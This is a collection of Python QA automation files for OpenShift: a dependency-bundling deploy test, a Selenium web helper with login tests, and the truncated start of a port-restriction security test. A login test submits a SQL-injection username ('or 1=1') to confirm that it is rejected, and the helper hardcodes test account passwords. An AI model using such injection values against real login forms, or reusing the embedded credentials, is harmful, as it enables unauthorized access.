(\"nodejs\"):\n cmd = \"echo 'No need to re-write for jbossas app'\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n self.add_step(\"12. Re-write .openshift/action_hooks/deploy\",\n cmd,\n expect_return=0)\n\n # 13. git push all the changes\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n str_list = [\".openshift/markers/force_clean_build found\", \"remote: Downloading\"]\n unexpect_str_list = []\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n str_list = [\"remote: Installing pg\", \"ls: cannot access\", \"RESULT=1\"]\n unexpect_str_list = [\"remote: Installing rhc\"]\n elif self.test_variant == \"php\":\n str_list = [\".openshift/markers/force_clean_build found\", \"ls: cannot access\", \"RESULT=1\"]\n unexpect_str_list = [\"remote: downloading\"]\n elif self.test_variant == \"perl\":\n str_list = [\".openshift/markers/force_clean_build found\", \"ls: cannot access\", \"RESULT=1\"]\n unexpect_str_list = [\"remote: Fetching\"]\n elif self.test_variant in (\"python\", \"wsgi\"):\n str_list = [\".openshift/markers/force_clean_build found\", \"ls: cannot access\", \"RESULT=1\"]\n unexpect_str_list = [\"remote: Downloading\"]\n elif self.test_variant in (\"nodejs\"):\n str_list = [\".openshift/markers/force_clean_build found! Recreating npm modules\", \"ls: cannot access\", \"RESULT=1\"]\n unexpect_str_list = []\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n self.add_step(\"13. git push all the changes\",\n \"cd %s && touch xxxx && git add . && git commit -am t && git push\" \n %(self.app_name),\n expect_description=\"libraries are removed successfully\",\n expect_return=0,\n expect_str=str_list,\n unexpect_str=unexpect_str_list)\n\n\n # 14.Check app via browser\n url_suffix=\"\"\n if self.test_variant == \"php\":\n test_html = \"\"\n unexpect_test_html = \"get_correct_number\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n test_html = \"Welcome to OpenShift\"\n unexpect_test_html = \"NO_XX\"\n elif self.test_variant in (\"python\",\"wsgi\"):\n test_html = \"Internal Server Error\"\n unexpect_test_html = \"Congratulations on your first Django-powered page\"\n elif self.test_variant == \"perl\":\n test_html = \"Welcome to OpenShift\"\n unexpect_test_html = \"NO_XX\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n test_html = \"Hello World!\"\n unexpect_test_html = \"NO_XX\"\n url_suffix = \"/HelloWorld/HelloWorld\"\n elif self.test_variant in (\"nodejs\"):\n test_html = \"Service Temporarily Unavailable\"\n unexpect_test_html = \"Welcome to OpenShift\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n self.add_step(\n \"14.Check app via browser, php/wsgi app should NOT availale Now, jbossas/perl/rack still working fine\",\n \"curl -L -H 'Pragma: no-cache' %s\",\n string_parameters = [get_app_url(self, url_suffix)],\n expect_str=[test_html],\n unexpect_str=[unexpect_test_html],\n try_interval=9,\n try_count=6)\n\n # 15. Add libraries back\n if self.test_variant == \"php\":\n cmd = \"echo 'channel://pear.php.net/Validate-0.8.4' > %s/deplist.txt\" %(self.app_name)\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd = \"echo 'No denpendency need to be remove for jbossas app'\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n cmd = '''cd %s && echo \"gem 'rhc'\" >>Gemfile && bundle check && sed -i \"s/rhc \\(.*\\)/rhc \\(0.71.2\\)/g\" Gemfile.lock''' %(self.app_name)\n elif self.test_variant in (\"python\", \"wsgi\"):\n cmd = \"cd %s && sed -i '9s/^#//g' setup.py\" %(self.app_name)\n elif self.test_variant == \"perl\":\n cmd = \"echo 'YAML' > %s/deplist.txt\" %(self.app_name)\n elif self.test_variant in (\"nodejs\"):\n cmd = \"\"\"cd %s && sed -i '{\\n/dependencies/ a\\\\\\n \"optimist\": \"0.3.4\"\\n}' package.json\"\"\" % (self.app_name)\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n self.info(\"skip step 15 for jbossas app\")\n else:\n self.add_step(\"15. Added libraries denpendency back\",\n cmd,\n expect_return=0)\n\n # 16. re-write .openshift/action_hooks/deploy\n if self.test_variant == \"php\":\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}php/phplib/pear/pear/download/Validate-0.8.4.tgz \\&\\& ls ${OPENSHIFT_HOMEDIR}php-5.3/phplib/pear/pear/php/Validate.php\"\n cmd = \"\"\"sed -i 's#command=\"ls.*\"#command=\"%s\"#g' %s/.openshift/action_hooks/deploy\"\"\" %(cmd_str, self.app_name)\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n cmd = \"echo 'No need to re-write for rack app'\"\n elif self.test_variant == \"perl\":\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}perl/perl5lib/lib \\&\\& ls ~/.cpanm/work\"\n cmd = \"\"\"sed -i 's#command=\"ls.*\"#command=\"%s\"#g' %s/.openshift/action_hooks/deploy\"\"\" %(cmd_str, self.app_name)\n elif self.test_variant in (\"python\",\"wsgi\"):\n cmd = \"echo 'No need to re-write for wsgi app'\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd = \"echo 'No need to re-write for jbossas app'\"\n elif self.test_variant in (\"nodejs\"):\n cmd = \"echo 'No need to re-write for nodejs app'\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n print \"\\nskip step 16 for jbossas app\"\n else:\n self.add_step(\n \"16. Re-write .openshift/action_hooks/deploy\",\n cmd,\n expect_return=0)\n\n # 17. git push all the changes\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n str_list = [\".openshift/markers/force_clean_build found\", \"remote: Downloading\"]\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n str_list = [\"remote: Installing pg\", \"remote: Installing rhc\", \"RESULT=0\"]\n unexpect_str_list = [\"No such file or directory\"]\n elif self.test_variant == \"php\":\n str_list = [\".openshift/markers/force_clean_build found\", \"remote: downloading\", \"RESULT=0\"]\n unexpect_str_list = [\"No such file or directory\"]\n elif self.test_variant == \"perl\":\n str_list = [\".openshift/markers/force_clean_build found\", \"remote: Fetching\", \"RESULT=0\"]\n unexpect_str_list = [\"No such file or directory\"]\n elif self.test_variant in (\"python\", \"wsgi\"):\n str_list = [\".openshift/markers/force_clean_build found\", \"remote: Downloading\", \"RESULT=0\"]\n unexpect_str_list = [\"No such file or directory\"]\n elif self.test_variant in (\"nodejs\"):\n str_list = [\".openshift/markers/force_clean_build found! Recreating npm modules\", \"RESULT=0\"]\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n self.info(\"skip step 17 for jbossas app\")\n else:\n self.add_step(\"17. git push all the changes\",\n \"cd %s && touch xxxxx && git add . && git commit -am t && git push\" %(self.app_name),\n expect_description=\"libraries are removed successfully\",\n expect_return=0,\n expect_str=str_list,\n unexpect_str=unexpect_str_list)\n\n # 18.Check app via browser\n if self.test_variant == \"php\":\n test_html = \"get_correct_number\"\n elif self.test_variant in (\"rack\",\"ruby\", \"ruby-1.9\"):\n test_html = \"Welcome to OpenShift\"\n elif self.test_variant in ( \"wsgi\", \"python\") :\n test_html = \"Congratulations on your first Django-powered page\"\n elif self.test_variant == \"perl\":\n test_html = \"Welcome to OpenShift\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n test_html = \"Hello World!\"\n elif self.test_variant in (\"nodejs\"):\n test_html = \"Welcome to OpenShift\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n self.info(\"skip step 18 for jbossas app\")\n else:\n self.add_step(\n \"18.Check app via browser, now all kinds of app should work fine\",\n \"curl -H 'Pragma: no-cache' %s\",\n string_parameters = [get_app_url(self)],\n expect_return=0,\n expect_str=[test_html],\n try_interval=9,\n try_count=3)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ServerSideBundlingLibsAndForceCleanBuild)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6336485743522644, "alphanum_fraction": 0.637607216835022, "avg_line_length": 37.274410247802734, "blob_id": "aa3f612c70ed03661c30325740df1db43f745b5c", "content_id": "a9c45d71b5be5b1b90705578946b6376be8e3371", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22735, "license_type": "no_license", "max_line_length": 125, "num_lines": 594, "path": "/automation/open/lib/autoweb.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport clog\nimport sys\nimport time\nimport unittest\nimport rhtest\n\n\"\"\"\nclass and support functions for web automation\n\n\"\"\"\n\nlog = clog.get_logger()\n\nclass AutoWeb(rhtest.Test, unittest.TestCase):\n log = log\n driver = None #webdriver.Firefox() #default\n browser = 'firefox'\n base_url = None\n proxy = False\n browserpath = 0\n platform = 'dev'\n domain = 'yujzhang2259'\n\n username_simple_account = '[email protected]'\n password_simple_account = 'redhat'\n username_both_registered_openshift_account = '[email protected]'\n password_both_registered_openshift_account = 'redhat'\n username_both_registered_RHN_account = 'mgaostg69'\n password_both_registered_RHN_account = '111111'\n username_RHN_account = 'mgaostg59'\n username_email_of_RHN_account = '[email protected]'\n password_email_of_RHN_account = 'redhat'\n username_not_accept_terms_account = '[email protected]'\n password_not_accept_terms_account = 'redhat'\n\n \n def __init__(self, **kwargs):\n if kwargs.has_key('logger'):\n # use local global logger if none is given (with framework, then \n # the framework logger should be used.\n self.log = kwargs['logger']\n\n if kwargs.has_key('browser'):\n self.browser = kwargs['browser'].strip().lower()\n if kwargs.has_key('ip'):\n self.base_url = \"https://\" + kwargs['ip']\n if kwargs.has_key('browser_path'):\n self.browserpath = kwargs['browserpath']\n\n if kwargs.has_key('config'):\n self.config = kwargs['config']\n\n if kwargs.has_key('proxy'):\n self.proxy=kwargs['proxy']\n \n if self.proxy:\n print \"### setting proxy\"\n self.profile=webdriver.FirefoxProfile()\n self.profile.set_preference(\"network.proxy.type\", 1)\n self.profile.set_preference(\"network.proxy.http\", \"file.sjc.redhat.com\")\n self.profile.set_preference(\"network.proxy.http_port\", 3128)\n self.profile.set_preference(\"network.proxy.ssl\", \"file.sjc.redhat.com\")\n self.profile.set_preference(\"network.proxy.ssl_port\", 3128)\n self.driver = webdriver.Firefox(self.profile)\n else:\n self.driver = webdriver.Firefox()\n pass # self.info(\"xxx\", 1)\n self.verificationErrors = []\n\n\n def wait_element_present_by_link_text(self,name):\n self.do_wait(By.LINK_TEXT, name)\n \n def check_title(self, title):\n time.sleep(5)\n title_match = False\n for i in range(60):\n try:\n if title == self.driver.title:\n title_match = True\n break\n except:\n pass\n time.sleep(1)\n if not title_match:\n log.error(\"timed out, '%s' is not equal to '%s'\" % title, self.driver.title)\n\n def assert_element_not_present_by_css(self, css):\n try: self.assert_false(is_element_present(self, By.CSS_SELECTOR,css))\n except AssertionError as e: self.verificationErrors.append(str(e))\n \n def assert_element_present_by_css(self, css, msg=''):\n try: self.assert_true(self.is_element_present(By.CSS_SELECTOR,css))\n except AssertionError as e: self.verificationErrors.append(msg+\",\"+str(e))\n\n def assert_element_present_by_id(self, idname, msg=''):\n try: self.assert_true(self.is_element_present(By.ID,idname))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_element_not_present_by_id(self, idname):\n try: self.assert_false(self.is_element_present(self, By.ID,idname))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_element_present_by_xpath(self, xpath):\n try: self.assert_true(self.is_element_present(self, By.XPATH,xpath))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_element_present_by_link_text(self, link_text):\n self.assert_true(self.is_element_present(By.LINK_TEXT,link_text))\n\n def assert_element_present_by_partial_link_text(self, partial_link_text):\n try: self.assert_true(is_element_present(self, By.PARTIAL_LINK_TEXT ,partial_link_text))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_element_present_by_name(self, name):\n try: self.assert_true(is_element_present(self, By.NAME ,name))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_element_present_by_class_name(self, class_name):\n try: self.assert_true(is_element_present(self, By.CLASS_NAME ,class_name))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_element_present_by_tag_name(self, tag_name):\n try: self.assert_true(is_element_present(self, By.TAG_NAME ,tag_name))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n\n def assert_element_present(self, how,what):\n try: self.assert_true(is_element_present(self, how ,what))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_text_equal_by_css(self, text,css, msg=''):\n try: self.assert_equal(text,self.driver.find_element_by_css_selector(css).text)\n except (AssertionError, NoSuchElementException) as e: self.verificationErrors.append(\"%s >> %s\"%(msg,str(e)))\n\n def assert_text_equal_by_xpath(self, text, xpath, msg=''):\n try: self.assert_equal(text,self.driver.find_element_by_xpath(xpath).text)\n except (AssertionError, NoSuchElementException) as e: self.verificationErrors.append(\"%s >> %s\"%(msg,str(e)))\n\n def assert_text_equal_by_partial_link_text(self, text, partial_link_text, msg=''):\n try: self.assertEqual(text,self.driver.find_element_by_partial_link_text(partial_link_text).text)\n except (AssertionError, NoSuchElementException) as e: self.verificationErrors.append(\"%s >> %s\"%(msg,str(e)))\n\n def assert_text_equal_by_id(self, text,id_name, msg=''):\n try: self.assertEqual(text,self.driver.find_element_by_id(id_name).text)\n except (AssertionError, NoSuchElementException) as e: self.verificationErrors.append(\"%s >> %s\"%(msg,str(e)))\n\n def assert_text_regexp_match_by_css(self, text, css, msg=''):\n try: self.assertRegexpMatches(self.driver.find_element_by_css_selector(css).text,text)\n except (AssertionError, NoSuchElementException) as e: self.verificationErrors.append(\"%s >> %s\"%(msg,str(e)))\n\n def assert_value_equal_by_id(self, value,id_name, msg=''):\n try: self.assertEqual(value,self.driver.find_element_by_id(id_name).get_attribute(\"value\"))\n except (AssertionError, NoSuchElementException) as e: self.verificationErrors.append(\"%s >> %s\"%(msg,str(e)))\n\n def is_text_equal_by_css(self, text,css):\n for i in range(60):\n try:\n if text == self.driver.find_element_by_css_selector(css).text: break\n except: pass\n time.sleep(1)\n else: self.fail(\"time out,%s is not equal to %s\" %(text,self.driver.find_element_by_css_selector(css).text))\n\n def is_text_equal_by_xpath(self, text,xpath):\n for i in range(60):\n try:\n if text == self.driver.find_element_by_xpath(xpath).text: break\n except: pass\n time.sleep(1)\n else:self.fail(\"time out,%s is not equal to %s\" %(text,self.driver.find_element_by_xpath(xpath).text))\n\n # support functions \n def click_element_by_link_text(self, link_text):\n self.wait_element_present_by_link_text(link_text)\n self.driver.find_element_by_link_text(link_text).click()\n\n def click_element_by_css(self, css):\n self.wait_element_present_by_css(self,css)\n self.driver.find_element_by_css_selector(css).click()\n\n def click_element_by_id(self, id_name):\n self.wait_element_present_by_id(id_name)\n self.driver.find_element_by_id(id_name).click()\n\n def click_element_by_xpath(self, xpath):\n self.wait_element_present_by_xpath(xpath)\n self.driver.find_element_by_xpath(xpath).click()\n\n def click_element_by_name(self, name):\n self.wait_element_present_by_name(name)\n self.driver.find_element_by_name(name).click()\n\n def click_element_by_xpath_wait(self,xpath):\n self.wait_element_present_by_xpath(xpath)\n self.driver.find_element_by_xpath(xpath).click()\n time.sleep(8) \n\n def click_element_by_class(self,class_name):\n self.wait_element_present_by_class(self,class_name)\n self.driver.find_element_by_class_name(class_name).click()\n\n def click_element_by_css_no_wait(self,css):\n self.driver.find_element_by_css_selector(css).click()\n\n def click_element_by_id_no_wait(self,id_name):\n self.driver.find_element_by_id(id_name).click()\n\n def click_element_by_xpath_no_wait(self,xpath):\n self.driver.find_element_by_xpath(xpath).click()\n\n def click_element_by_partial_link_text_no_wait(self,partial_link_text):\n self.driver.find_element_by_partial_link_text(partial_link_text).click()\n\n def do_wait(self, element_type, element_name):\n try:\n element = WebDriverWait(self.driver, 60).until(lambda driver : driver.find_element(element_type, element_name))\n except:\n self.log.error(\"Timed out waiting for element '%s'\" % element_name)\n\n def wait_element_present_by_xpath(self,xpath):\n self.do_wait(By.XPATH, xpath)\n \n def wait_element_not_present_by_xpath(self,xpath):\n for i in range(60):\n try:\n if not is_element_present(self,By.XPATH, xpath): break\n except: pass\n time.sleep(1)\n else: self.fail(\"time out,%s is present\"%(xpath))\n\n def wait_element_present_by_css(self, css):\n self.do_wait(By.CSS_SELECTOR, css)\n\n def wait_element_present_by_id(self, idname):\n self.do_wait(By.ID, idname)\n\n def wait_element_present_by_class(self, class_name):\n self.do_wait(By.CLASS_NAME, class_name)\n\n\n def wait_element_present_by_name(self,name):\n self.do_wait(By.NAME, name)\n\n def go_to_home(self):\n self.driver.get(self.base_url+\"/app\")\n self.check_title(\"OpenShift by Red Hat\")\n\n def go_to_community(self):\n self.driver.get(self.base_url+\"/community\")\n self.check_title(\"Welcome to OpenShift | OpenShift by Red Hat\") \n\n def go_to_developer(self):\n self.driver.get(self.base_url+\"/community/developers\")\n self.check_title(\"Developer Center | OpenShift by Red Hat\") \n\n def go_to_pricing(self):\n self.driver.get(self.base_url+\"/pricing\")\n\n def go_to_signin(self, link_text=\"Sign In to Manage Your Apps\".upper()):\n self.click_element_by_link_text(link_text)\n self.is_element_displayed(By.ID,\"web_user_rhlogin\")\n\n def go_to_signup(self):\n self.go_to_home()\n self.scroll_to_bottom()\n self.click_element_by_xpath(\".//*[@id='bottom_signup']/div/a\")\n time.sleep(2)\n if not is_element_displayed(self,By.ID,\"signup\"):\n self.click_element_by_xpath(\".//*[@id='bottom_signup']/div/a\")\n self.is_element_displayed(By.ID,\"signup\")\n\n def go_to_partners(self):\n partner_page=self.base_url+\"/app/partners\"\n self.driver.get(partner_page)\n self.check_title(\"OpenShift by Red Hat | Meet Our Partners\")\n\n def go_to_legal(self):\n legal_page=self.base_url+\"/app/legal\"\n self.driver.get(legal_page)\n self.check_title(\"OpenShift by Red Hat | Terms and Conditions\")\n self.driver.execute_script(\"window.scrollTo(0, 0);\")\n\n\n def go_to_platformoverview(self):\n go_to_home(self)\n self.click_element_by_link_text(\"Platform Overview\")\n self.check_title(\"OpenShift by Red Hat | Cloud Platform\")\n\n def go_to_account(self):\n self.driver.get(self.base_url+\"/app/account\")\n \n \n def go_back(self): \n self.driver.back()\n time.sleep(5)\n \n def go_to_register(self):\n register_page=self.base_url+\"/app/account/new\"\n self.driver.get(register_page)\n\n def go_to_platform(self):\n platform_page=self.base_url+\"/app/platform\"\n self.driver.get(platform_page)\n\n def go_to_login(self):\n login_page=self.base_url+\"/app/login\"\n self.driver.get(login_page)\n\n def go_to_domain_edit(self):\n domain_edit_page=self.base_url+\"/app/domain/edit\"\n self.driver.get(domain_edit_page)\n \n def go_to_create_drupal(self):\n create_drupal_page=self.base_url+\"/app/console/application_types/drupal\"\n self.driver.get(create_drupal_page)\n\n def go_to_create_app(self, app_type):\n create_app_page=self.base_url+\"/app/console/application_types/\"+app_type\n self.driver.get(create_app_page)\n time.sleep(3)\n self.driver.refresh()\n time.sleep(2)\n\n def create_app(self, app_type, app_name):\n self.go_to_create_app(app_type)\n time.sleep(5)\n self.input_by_id(\"application_name\", app_name)\n self.click_element_by_name(\"submit\")\n time.sleep(5)\n self.driver.refresh()\n time.sleep(2)\n \n\n def go_to_app_detail(self, app_name):\n app_detail_page=self.base_url+\"/app/console/applications/\"+app_name\n self.driver.get(app_detail_page)\n time.sleep(3)\n self.driver.refresh()\n time.sleep(2)\n\n def go_to_account_page(self):\n account_page=self.base_url+\"/app/account\"\n self.driver.get(account_page)\n self.driver.refresh()\n time.sleep(2)\n\n def go_to_password_edit(self):\n password_edit_page=self.base_url+\"/app/account/password/edit\"\n self.driver.get(password_edit_page)\n self.driver.refresh()\n time.sleep(2)\n\n def delete_last_app(self, app_name):\n self.go_to_app_detail(app_name)\n time.sleep(2)\n self.click_element_by_link_text(\"Delete this application\")\n time.sleep(1)\n self.click_element_by_name(\"submit\")\n time.sleep(60)\n self.go_to_app_detail(app_name)\n self.assert_text_equal_by_xpath(\"Sorry, but the page you were trying to view does not exist.\", '''//article/div/p''')\n \n\n def delete_app(self, app_name):\n self.go_to_app_detail(app_name)\n time.sleep(2)\n self.click_element_by_link_text(\"Delete this application\")\n time.sleep(1)\n self.click_element_by_name(\"submit\")\n time.sleep(60)\n self.go_to_app_detail(app_name)\n self.assert_text_equal_by_xpath(\"Sorry, but the page you were trying to view does not exist.\", '''//article/div/p''')\n \n\n def add_cartridge(self, app_name, cartridge_name):\n self.go_to_app_detail(app_name)\n self.click_element_by_xpath('''//section[@id='app-cartridges']/div[2]/a''')\n self.click_element_by_xpath(\"//a[contains(@href, '/cartridge_types/\"+cartridge_name+\"')]\")\n self.click_element_by_id(\"cartridge_submit\")\n time.sleep(8)\n self.driver.refresh()\n time.sleep(2)\n\n def change_password(self, old_password, new_password):\n\n self.go_to_password_edit()\n self.input_by_id(\"web_user_old_password\", old_password)\n self.input_by_id(\"web_user_password\", new_password) \n self.input_by_id(\"web_user_password_confirmation\", new_password) \n self.click_element_by_name('commit')\n time.sleep(10)\n self.driver.refresh()\n time.sleep(2)\n \n\n def input_by_id(self, id_name, input_content):\n self.driver.find_element_by_id(id_name).clear()\n self.driver.find_element_by_id(id_name).send_keys(input_content)\n \n def clear_element_value(self, id_name):\n self.driver.find_element_by_id(id_name).clear()\n \n\n #############################################################\n # check & assertions\n #############################################################\n def is_element_displayed(self, how, what):\n #res = self.assert_true(self.driver.find_element(by=how,value=what).is_displayed())\n #self.info(\"xxx\", 1)\n #try:#self.assert_true(self.driver.find_element(by=how,value=what).is_displayed(),what+\" is not displayed\")\n time.sleep(4)\n self.assert_true(self.driver.find_element(by=how,value=what).is_displayed())\n #except AssertionError as e: self.verificationErrors.append(str(e))\n\n def is_element_hidden(self,how,what):\n try:self.assertFalse(self.driver.find_element(by=how,value=what).is_displayed())\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def wait_element_not_displayed_by_id(self,id_name):\n try:\n WebDriverWait(self.driver,120).until(self.driver.find_element_by_id(id_name))\n self.assertTrue(self.driver.find_element_by_id(id_name).is_displayed())\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def is_text_displayed(self,text,css):\n try:\n WebDriverWait(self.driver, 100).until(self.driver.find_element_by_css_selector(css))\n self.assertTrue( text == self.driver.find_element_by_css_selector(css).text)\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def is_text_displayed_by_id(self,text,id_name):\n try:\n WebDriverWait(self.driver, 100).until(self.driver.find_element_by_id(id_name))\n self.assertTrue( text == self.driver.find_element_by_id(id_name).text)\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n\n ## helper functions \n def login(self):\n username = self.config.OPENSHIFT_user_email\n password = self.config.OPENSHIFT_user_passwd\n\n self.go_to_login()\n self.wait_element_present_by_id(\"web_user_rhlogin\")\n self.input_by_id(\"web_user_rhlogin\", username)\n self.input_by_id(\"web_user_password\", password)\n self.click_element_by_name('''commit''')\n time.sleep(5)\n self.driver.refresh()\n time.sleep(2)\n\n def login_new(self,username,password):\n \n self.go_to_login()\n self.wait_element_present_by_id(\"web_user_rhlogin\")\n self.input_by_id(\"web_user_rhlogin\", username)\n self.input_by_id(\"web_user_password\", password)\n self.click_element_by_name('''commit''')\n time.sleep(5)\n self.driver.refresh()\n time.sleep(2)\n\n\n def logout(self):\n self.assert_element_present_by_link_text(\"Sign Out\")\n self.click_element_by_link_text(\"Sign Out\")\n sign_in_text=\"Sign In to Manage Your Apps\".upper()\n self.assert_element_present_by_link_text(sign_in_text)\n\n def __del__(self):\n self.driver.close()\n\ndef _test(ip):\n web = AutoWeb(ip=ip)\n #web = AutoWeb(ip=ip, proxy=True)\n web.go_to_home()\n sign_in_text=\"Sign In to Manage Your Apps\".upper()\n web.go_to_signin(sign_in_text)\n web.assert_element_present_by_link_text(\"Forgot your password?\")\n web.assert_element_present_by_link_text(\"create an account\")\n web.assert_element_present_by_css(\"input.btn\")\n\ndef test_login_invalid_user(ip):\n \"\"\" test invalid user \"\"\"\n web = AutoWeb(ip=ip)\n web.go_to_home()\n web.go_to_signin()\n web.login(\"baduser\", \"vostok08\")\n print \"#############\"\n #web.assert_text_equal_by_css(\"Invalid username or password\",\"div.message.error\")\n web.assert_text_equal_by_css(\"Invalid username or password\",\"div.alert.alert-error\")\n\ndef test_login_without_user(ip):\n \"\"\" test_login_without_user \"\"\"\n web = AutoWeb(ip=ip)\n web.go_to_home()\n web.go_to_signin()\n web.login(\"\", \"vostok08\")\n web.assert_text_equal_by_css(\"This field is required.\",\"p.help-inline\")\n\ndef test_login_without_pwd(ip):\n web = AutoWeb(ip=ip)\n web.go_to_home()\n web.go_to_signin()\n web.login(\"[email protected]\", \"\")\n web.assert_text_equal_by_css(\"This field is required.\",\"p.help-inline\")\n\ndef test_login_granted_user(ip, username='[email protected]', password=\"vostok08\"):\n log.info(\"Testing login with valid user\")\n web = AutoWeb(ip=ip)\n web.go_to_home()\n web.go_to_signin()\n web.login(username, password)\n web.check_title(\"OpenShift by Red Hat\")\n web.assert_element_present_by_link_text(\"Sign Out\")\n\ndef test_login_sql_bypass(ip):\n log.info(\"Testing login with sql bypass\")\n web = AutoWeb(ip=ip)\n web.go_to_home()\n web.go_to_signin()\n web.login(\"[email protected] or 1=1\", \"vostok08\")\n web.assert_text_equal_by_css(\"Invalid username or password\",\"div.alert\")\n\ndef test_login_session_exists(ip):\n\n web = AutoWeb(ip=ip)\n web.go_to_home()\n web.go_to_signin()\n web.login()\n web.check_title(\"OpenShift by Red Hat\")\n web.assert_element_present_by_link_text(\"Sign Out\") \n\n\ndef test_login_logout_back(ip):\n web = AutoWeb(ip=ip)\n\n web.go_to_home()\n web.go_to_signin()\n web.login()\n web.check_title(\"OpenShift by Red Hat\")\n web.assert_element_present_by_link_text(\"Sign Out\")\n web.logout()\n web.go_back()\n web.driver.refresh()\n web.assert_element_present_by_id(\"login_input\")\n\ndef test_login_cookie_deleted(self):\n web.go_to_home(self)\n web.go_to_signin(self)\n web.login(self,config.granted_user[0],config.granted_user[1])\n time.sleep(5)\n# web.wait_for_ajax(self)\n web.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n # web.assert_element_present_by_link_text(self,\"Get started!\")\n _greetings=web.generate_greetings(config.granted_user[0])\n web.assert_element_present_by_link_text(self,_greetings)\n web.assert_element_present_by_link_text(self,\"Sign out\")\n self.driver.delete_cookie(\"_rhc_session\")\n self.driver.delete_cookie(\"rh_sso\")\n self.driver.refresh()\n web.assert_element_present_by_link_text(self,\"Sign in\")\n \n\n\n \n \n \nif __name__ == '__main__':\n ip = sys.argv[1]\n\n test_login_logout_back(ip)\n #test_login_sql_bypass(ip)\n\n #web = AutoWeb(ip=ip)\n #web = AutoWeb(ip=ip, proxy=True)\n #web.go_to_home()\n #log.info(\"#################\")\n #sign_in_text=\"Sign In to Manage Your Apps\".upper()\n #web.go_to_signin(sign_in_text)\n #web.assert_element_present_by_link_text(\"Forgot your password?\")\n #web.assert_element_present_by_link_text(\"create an account\")\n #web.assert_element_present_by_css(\"input.btn\")\n \n\n #web.assert_element_present_by_css(\"a.password_reset.more\")\n" }, { "alpha_fraction": 0.5242875218391418, "alphanum_fraction": 0.5592477321624756, "avg_line_length": 35.411766052246094, "blob_id": "948a48a5368dfde536e40663fa73171f13b8780e", "content_id": "e6d175b5e3587b80858837f44a03c8c48882a949", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8667, "license_type": "no_license", "max_line_length": 119, "num_lines": 238, "path": "/automation/open/testmodules/RT/security/restrict_port_connections.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: restrict_port_connections.py\n# Date: 2012/02/29 05:36\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass ObserverGenerator(object):\n @classmethod\n def get_application(self):\n return '''\n#!/usr/bin/python\nimport os\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \nimport urllib2\nimport socket\nimport json\n\ncontests=[ \"127.0.250.1\", \"127.0.250.129\", \"127.0.251.1\",\n \"127.0.251.129\", \"127.0.252.1\" ]\nbinders=[ \"127.0.250.2\", \"127.0.250.130\", \"127.0.251.2\",\n \"127.0.251.130\", \"127.0.252.2\" ]\ncmirror=[ \"169.254.250.1\", \"169.254.250.129\", \"169.254.251.1\",\n \"169.254.251.129\", \"169.254.252.1\" ]\nbmirror=[ \"169.254.250.2\", \"169.254.250.130\", \"169.254.251.2\",\n \"169.254.251.130\", \"169.254.252.2\" ]\n\ndef application(environ, start_response):\n\n 